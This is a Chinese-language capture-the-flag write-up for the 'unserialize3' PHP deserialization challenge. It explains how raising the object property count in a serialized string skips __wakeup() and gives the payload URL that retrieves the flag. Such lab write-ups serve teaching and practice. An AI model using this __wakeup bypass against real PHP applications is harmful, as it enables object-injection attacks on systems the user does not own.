php反序列化-unserialize3

目录

• unserialize3-php反序列化
  • unserialize3

unserialize3-php反序列化

unserialize3

• 环境地址：https://adworld.xctf.org.cn/task/answer?type=web&number=3&grade=1&id=4821&page=1

• 打开代码

  class xctf{
  public $flag = '111';
  public function __wakeup(){
  exit('bad requests');
  }
  ?code=
  

  _wakeup经常用在反序列化操作中，例如重新建立数据库连接，或执行其他初始化操作。所以猜测被反序列化了

  但是这里看到这里没有特别对哪个字符串序列化，所以把xctf类实例化后，进行反序列化利用php中的new运算符，实例化类xctf

  new是申请空间的操作符，一般用于类

  比如定义了一个class a{public i=0;}

  $c = new a(); 相当于定义了一个基于a类的对象，这时候 $c->i 就是0

  （参考https://zhidao.baidu.com/question/495110936393795804.html）

  写一段php代码执行(网上就有php代码在线执行)

  <?php
  class xctf{ //类
  public $flag = '111';//public定义flag变量公开可见
  public function __wakeup(){
  exit('bad requests');
  }
  }
  $a=new xctf();
  echo(serialize($a));
  ?>
  

  得出结果

  O:4:"xctf":1:{s:4:"flag";s:3:"111";}
  

  如果直接传参给code会被_wakeup()函数再次序列号，所以要绕过他，利用 _wakeup函数漏洞原理：当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过 _wakeup的执行。

  序列化返回的字符串格式：

  O:<length>:"<class name>":<n>:{<field name 1><field value 1>...<field name n><field value n>}
  

• O:表示序列化的是对象

• ：表示序列化的类名称长度

• ：表示序列化的类的名称

• ：表示被序列化的对象的属性个数

• <field name 1>：属性名

• <field value 1>：属性值

所以要修改属性个数，既把1改为2以上

O:4:"xctf":2:{s:4:"flag";s:3:"111";}

传参给code,得到flag：

http://111.200.241.244:61154/index.php?code=O:4:%22xctf%22:2:{s:4:%22flag%22;s:3:%22111%22;}